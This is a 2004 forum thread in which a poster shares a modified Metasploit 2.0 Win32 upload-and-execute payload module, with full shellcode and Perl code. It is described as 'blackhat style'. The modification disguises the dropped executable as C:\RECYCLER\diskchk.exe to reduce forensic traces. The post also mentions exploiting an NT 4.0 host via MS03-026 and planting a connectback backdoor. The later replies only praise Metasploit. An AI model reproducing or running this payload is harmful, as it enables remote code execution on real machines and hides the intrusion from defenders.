slynx
Jun 27 2004, 09:23 AM
Okay.... ever since the release of Metasploit Framework 2.0 I've been coding all my exploits
in there, porting existing ones from C and Python, and using the included exploits to perform
penetration tests. I find the payload options in this Framework are far better than those of
CORE IMPACT or Immunity's CANVAS. However, after using the Win32 Upload/Exec
payload to succesfully exploit an unpatched NT 4.0 box with MS03-026 and upload a Win32
Connectback Backdoor I noticed that the file c:\metasploit.exe suddenly appears. After reading
through the ASM file for that payload I realized that the destination file on the remote
machine was hardcoded, and that was the file I was uploading. Well, I don't like this for two
reasons; one, it made me paranoid, thinking that some new Metasploit virus was now unleashed
on my network (aaaahhhhh!!! noooo!!!!), and two, it leaves blatent traces of the attack
(*caugh* not that that matters....) so I took it upon myself to change that one little like in
Win32UploadExec.pm and remake the shellcode. So here is the newly updated and blackhat style
Win32UploadExec.pm for all to use. Just replace the old Win32UploadExec.pm in \lib\Msf\PayloadComponent
with this one.
Enjoy :>
| CODE |
package Msf::PayloadComponent::Win32UploadExecStage;
use strict;
use base 'Msf::PayloadComponent::Win32StagePayload';
my $info = {
'UserOpts' =>
{
'PEXEC' => [1, 'PATH', 'Full path to file to upload and execute'],
},
'Win32StagePayload' =>
{
# Modified Payload : Temporary File Changed to C:\RECYCLER\diskchk.exe
# Modified By : slynx < sk0rch3r [at] hotmail.com >
Offsets => { EXITFUNC => [264, 'V'] },
Payload =>
"\xff\x75\x00\x68\xa5\x17\x00\x7c\xff\x55\x04\x89\x45\x64\xff\x75".
"\x00\x68\x1f\x79\x0a\xe8\xff\x55\x04\x89\x45\x68\xff\x75\x00\x68".
"\xfb\x97\xfd\x0f\xff\x55\x04\x89\x45\x6c\x8d\x45\x78\x6a\x00\x6a".
"\x04\x50\x57\xff\x55\x18\x8b\x45\x78\xe8\x18\x00\x00\x00\x43\x3a".
"\x5c\x52\x45\x43\x59\x43\x4c\x45\x52\x5c\x64\x69\x73\x6b\x63\x68".
"\x6b\x2e\x65\x78\x65\x00\x59\x89\x4d\x70\x6a\x00\x6a\x06\x6a\x04".
"\x6a\x00\x6a\x07\x68\x00\x00\x00\xe0\x51\xff\x55\x64\x89\xc3\x81".
"\xec\x58\xff\xff\xff\x89\x65\x74\x8b\x45\x74\x6a\x00\x6a\x20\x50".
"\x57\xff\x55\x18\x8b\x4d\x78\x29\xc1\x89\x4d\x78\x54\x89\xe1\x6a".
"\x00\x51\x50\xff\x75\x74\x53\xff\x55\x68\x59\x8b\x45\x78\x85\xc0".
"\x75\xd6\x53\xff\x55\x6c\x87\xfa\x31\xc0\x8d\x7c\x24\xac\x6a\x15".
"\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44\x66\xc7\x44".
"\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89\x7c\x24\x50".
"\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75".
"\x70\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0\x89".
"\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a\xff".
"\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55\x04\x31".
"\xdb\x53\xff\xd0"
}
};
sub new {
my $class = shift;
my $hash = @_ ? shift : { };
$hash = $class->MergeHash($hash, {'Info' => $info});
my $self = $class->SUPER::new($hash, @_);
return($self);
}
sub HandleConnection {
my $self = shift;
$self->SUPER::HandleConnection;
my $sock = $self->SocketOut;
my $blocking = $sock->blocking;
if(!open(INFILE, '<' . $self->GetVar('PEXEC'))) {
$self->PrintLine('[*] Could not open path to upload/exec.');
$self->KillChild;
return;
}
local $/;
my $upload = <INFILE>;
close(INFILE);
$sock->blocking(1);
$self->PrintLine('[*] Sleeping before sending file.');
sleep(2);
$self->PrintLine('[*] Uploading file (' . length($upload) . '), Please wait...');
$sock->send(pack('V', length($upload)));
$sock->send($upload);
$self->PrintLine('[*] Executing uploaded file...');
$sock->blocking($blocking);
}
1;
|
(I appologize for the wordiness of this and all my other posts ;p)
UPDATE: oops... left that extra ';' in there that fux0red loading into metasploit ;p
maybe i should start drafting my posts before clicking 'submit' :>
n4than_69
Jun 27 2004, 11:23 AM
metasploit framework is an excellent tool and could be very powerful one,
of course against unpatched boxes
i think its more useful if used with linux at least thats what i experienced
slynx
Jun 28 2004, 12:05 AM
Most of the exploits included in the Metasploit Framework do target *nix, but that
doesn't make it any less usefull against Windows systems. The real gold in the
Framework lies in the ability to quickly develop *new* exploits with on-the-fly
payload generation and giving you a consolodated place to organize yourself for
a pen-test.....
My $0.02 ....
predx
Jun 28 2004, 02:35 PM
hey thanks for the update. i must admin i havent test the orginal in metaframe yet but this will give me an excuse to thanks again
